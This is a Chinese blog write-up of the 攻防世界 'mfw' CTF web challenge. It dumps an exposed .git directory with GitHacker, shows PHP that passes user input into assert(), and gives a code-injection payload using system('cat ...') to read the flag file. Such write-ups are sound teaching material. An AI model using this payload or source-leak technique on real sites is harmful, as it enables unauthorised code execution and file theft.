攻防世界mfw

最新推荐文章于 2024-07-22 23:24:58 发布
最新推荐文章于 2024-07-22 23:24:58 发布
阅读量39 收藏
点赞数
文章标签: git php 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45955869/article/details/130943821
版权

本人24小时在线,如有疑问,可联系我!

攻防世界mfw

文章目录

题目

在这里插入图片描述

在这里插入图片描述

猜?

页面源码
在这里插入图片描述
右键,查看页面源码!
在这里插入图片描述
这不就是了?文件包含?文件上传?
看看后台目录(我的习惯)
在这里插入图片描述
什么也没有哦!
在这里插入图片描述
使用git

工具githacker
python3
kali里面打开就可以了

pip3 install -i https://pypi.org/simple/ GitHacker
githacker

在这里插入图片描述

githacker --url http://61.147.171.105:64962/.git/ --output-folder /home/kali/

在这里插入图片描述

把文件下载下来
在这里插入图片描述
打开flag.php。
能做到这里很不错了。借鉴了一下别人的文章。说注释掉了。
先看看这个

<?php
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} 
else {
	$page = "home";
}
$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

解释一下:

assert()函数其实是一个断言函数。
assert:
  这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;
        assert ( mixed $assertion [, string $description ] ) : bool
  如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
strpos() 函数查找字符串在另一字符串中第一次出现的位置,如果没有找到则返回flase.

由于文件并没有对输入的字符进行过滤,所以可以进行语句闭合修改语句原本的意思,构建的payload: /?page=');// #双斜杠 " // " 在php中表示注释
在这里插入图片描述
已知目录,就不用再查了(还记得吗?:不再用system('ls+xxx')回显路径)。
构造语句:?page=').system(‘cat+./templates/flag.php’);//
在这里插入图片描述
答案正确。
在这里插入图片描述

总结

这题考察PHP代码审计的能力,以及.git源码泄露的知识点。

qq_45955869
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界mfw_攻防世界-Web-mfw
weixin_29054399的博客
01-14 155
题目信息:image.png工具:GitHack,dirsearch知识点:git漏洞、代码审计打开题目场景,检查网站,发现这样一个页面image.png访问.git目录,疑似存在git源码泄露image.png再用dirsearch扫描,发现git源码泄露:使用 GitHack获取源码image.png得到源码index.php中关键代码如下if (isset($_GET['page'])) {...
攻防世界 mfw
ChamZhiZe的博客
09-08 97
看到这里 猜测是.Git泄露 使用GitHack GitHack 需要在 python2 的环境下 运行。 python GitHack.py http://111.200.241.244:58685/ .git/ 发现了templates目录下的flag.php 查看,但是没有发现有用信息。 只能查看一下 index文件,发现源码: <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "hom.
攻防世界 mfw git泄露构造闭合
m0_64180167的博客
10-07 296
这题也挺有想法 第一次确实没有想到。然后我们看index.php代码。我们githack 泄露一下。首先我们可以扫出 git。就是替换为cat即可。
攻防世界
handuoduo123的博客
12-05 949
攻防世界 新手题 misc 前5道 不得不说,这道题真的是入门级别了。答案就在题目中,复制粘贴就好 flag{th1s_!s_a_d4m0_4la9} 下载完题目是一张动态图隐约可以看到有个缺少定位符的二维码 隐约可以看到有个缺少定位符的二维码 利用PS把二维码补全(随意扣一张二维码的定位符就好了) 工具扫描得到flag{e7d478cf6b915f50ab1277f78502a2c5} 下载...
mfw-bootstrap
04-02
在压缩包文件"mfw-bootstrap-main"中,我们可以期待找到以下关键文件和目录: 1. **index.html** - 这通常是项目的主入口文件,展示了如何引入和使用Bootstrap模板及组件。 2. **css** - 包含自定义CSS样式文件,...
调度组织_MFW.pptx
10-08
《调度组织在工业企业管理中的核心作用》 调度管理在工业企业的运营中扮演着至关重要的角色,它是企业高效运行的“指挥中心”、“信息中心”和“协调中心”。调度管理不仅涉及到对企业活动的指挥与运筹,而且在信息...
peach-pit-mfwMFW第一天示例
02-25
"peach-pit-mfw"似乎是一个项目或教程的名称,它以"MFW第一天示例"为主题,意在引导用户了解或学习某个特定的技术或流程。"MFW"可能是"Monday First Working"的缩写,暗示这是系列教程的第一天,通常会介绍基础概念...
Gjhnsn.github.io:MFW投资组合
03-30
2. **个人投资组合**: MFW投资组合可能代表一个特定的投资模型或策略,用户可以在此展示他们的投资选择、历史回报和风险管理策略。这样的网站通常包括投资组合概述、资产配置、市场分析和投资目标等内容。 3. **...
角度转换、坐标转换.zip_MFW_T4V_angle转换_坐标转换_弧度 坐标正反算
07-14
角度转弧度,弧度转角度, 坐标的正算,坐标的反算
git】如何实现规范git commit -m的格式
hzxOnlineOk的博客
07-22 193
【代码】【git】如何实现规范git commit -m的格式。
git stash 命令详解
Yang的博客
07-22 235
git stash 命令详解 git stash save
git 过滤LFS文件下载
PHPer的技术记录
07-22 157
恢复下载。
鸿蒙仓颉语言【模块module】
m0_70748845的博客
07-22 107
模块配置文件,这里指项目的modules.json 文件,用于描述代码项目的基础元属性。
git遇到OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0
weixin_61570458的博客
07-22 250
一般是代理http/https或者其他问题导致的。最简单的方法,直接忽略SSL证书错误就好。
gitgit中的origin是什么意思
qq_35902025的博客
07-22 345
Git 中, origin 通常是指默认的远程仓库名称。当你克隆一个 Git 仓库时,克隆的仓库地址会被自动设置为远程仓库,并且默认的远程仓库名称是 origin。origin 是一个默认名称,你可以在克隆仓库时指定不同的名称,或者在克隆后通过 git remote rename 命令更改远程仓库的名称。这将从 origin 仓库的对应分支拉取更改并合并到你的本地分支。这会克隆仓库并默认将远程仓库名称设置为 origin。这将更改 origin 的 URL 为新的仓库地址。
Git下载与安装
最新发布
m0_63227888的博客
07-22 199
选择HTTP传输后端,使用默认推荐OpenSSL库即可,next。配置终端模拟器以使用Git Bash ,选择默认即可,next。设置“新存储库中初始分支的名称”,默认推荐即可,next。选择git pull的默认行为,默认即可,next。配置结束转换行,默认windows即可,next。选择需要安装的组件,这里默认即可,next。选择默认编辑器,默认推荐的即可,next。选择菜单文件夹,这里默认即可,next。选择安全密钥,默认推荐即可,next。选择git辅助工具,默认即可,next。
Git使用
2302_79730293的博客
07-17 972
Git使用
git实现多人协作开发同一个项目
技术应让更广泛的人群流入到实际产品开发中才是正统
07-18 884
如果你已经提交了代码,但想撤回这次提交,可以使用git reset或git revert命令。
度为2的有序树就是二叉树
09-01
- *3* [第六章 树和二叉树习题1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值